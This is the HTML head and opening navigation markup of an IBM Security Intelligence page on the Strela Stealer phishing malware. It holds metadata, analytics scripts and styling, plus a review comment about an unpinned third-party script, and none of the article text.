Strela Stealer: Today's invoice is tomorrow's phish
<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1"> <!-- DEFINITIONS --> <title>Strela Stealer: Today's invoice is tomorrow's phish</title> <!--<meta name="description" content="">--> <!-- THEME COLOR --> <meta name="theme-color" content="#000000"> <!-- REFERRER POLICY --> <meta name="referrer" content="no-referrer-when-downgrade"> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script> <!-- LANGUAGE/TRANSLATIONS --> <!-- AMP SCRIPTS --> <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script 
type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <!-- NOTE(review): swiper is loaded from unpkg with no version pin and no integrity/crossorigin attributes (the swiper-bundle.min.css stylesheet later in this head has the same gap), so whatever the CDN serves at that URL runs with full page privileges; pin an exact version and add SRI so an unexpected change is blocked rather than executed. --> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)"> <!-- FONTS --> <!-- <link rel="preload" href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500|IBM+Plex+Sans:300,400,500&display=swap" rel="stylesheet"> --> <!-- ANALYTICS --> <script> // Digital Registry digitalData = { "page": { "category": { "primaryCategory": "Threat Intelligence" }, "pageInfo": { "language": "en-US", "country": 
"US", "version": "custom", "effectiveDate": "2024-11-12", "publishDate": "2024-11-12", "optimizely": { "enabled": "false", }, "ibm": { "contentDelivery": "WordPress", "contentProducer": "Hand coded", "owner": "", "siteID": "SECURITYINTELLIGENCE", "type": "Xforce", } } } } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; 
i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; 
listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } // }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script> <!-- COREMETRICS --> <script defer src="https://1.www.s81c.com/common/stats/ida_stats.js" type="text/javascript"></script> <!-- AMP DEFAULT CSS --> <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } 
to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630"> <!-- CUSTOM CSS --> <meta name='robots' content='max-image-preview:large' /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return 
n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in 
e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! 
This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 
100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) 
!important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: 
var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: 
var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" 
src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.6.2" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/xforce/448388" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.2" /> <link rel='shortlink' href='https://securityintelligence.com/?p=448388' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fstrela-stealer-todays-invoice-tomorrows-phish%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fstrela-stealer-todays-invoice-tomorrows-phish%2F&format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans:200,300,400,500,600');@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500,600,700');@import 
url('https://fonts.googleapis.com/css2?family=IBM+Plex+Serif&display=swap')</style><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1722279696"> <!-- YOAST SEO --> <!-- This site is optimized with the Yoast SEO Premium plugin v13.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Strela Stealer: Today's invoice is tomorrow's phish" /> <meta property="og:description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it." 
/> <meta property="og:url" content="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Europe" /> <meta property="article:tag" content="Malware" /> <meta property="article:tag" content="Phishing" /> <meta property="article:tag" content="Ransomware" /> <meta property="article:tag" content="X-Force" /> <meta property="article:section" content="Threat Intelligence" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it." 
/> <meta name="twitter:title" content="Strela Stealer: Today's invoice is tomorrow's phish" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg","width":1200,"height":630,"caption":"closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols"},{"@type":"WebPage","@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#webpage","url":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/","name":"Strela Stealer: Today's invoice is tomorrow's phish","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#primaryimage"},"datePublished":"2024-11-12T11:00:00+00:00","dateModified":"2024-11-14T23:28:12+00:00","description":"IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. 
Learn more about the malware, the techniques for spreading it, and how to protect against it."}]}</script> <!-- / Yoast SEO Premium plugin. --> </head> <body class="si_body" > <nav id="navigation" class="navigation navigation--homepage " aria-label="Security Intelligence"> <div class="container"> <div class="row"> <!-- LOGO --> <div class="navigation__brand"> <a href="https://securityintelligence.com" title="Security Intelligence" tabindex="1"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence Logo"> <div fallback> <h6>Security Intelligence</h6> </div> </amp-img> </a> </div> <!-- DESKTOP MENU - HOVER --> <div class="navigation__menu" onmouseleave="delete localStorage['megamenu-status']"> <a tabindex="2" id="nav-news" href="/news/" class="navigation__button " data-menu="megamenu__news" onclick="localStorage['megamenu-status'] = 'first-interaction';">News</a> <a tabindex="4" id="nav-topics" href="/category/topics/" class="navigation__button " data-menu="megamenu__topics" onclick="localStorage['megamenu-status'] = 'first-interaction';">Topics</a> <a tabindex="5" id="nav-x-force" href="/x-force/" class="navigation__button " data-menu="megamenu__threat" onclick="localStorage['megamenu-status'] = 'first-interaction';">X-Force</a> <a tabindex="6" id="nav-media" href="/media/" class="navigation__button " data-menu="megamenu__podcast" onclick="localStorage['megamenu-status'] = 'first-interaction';">Podcast</a> <button aria-label="search Button" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="-1" type="button"> <amp-img 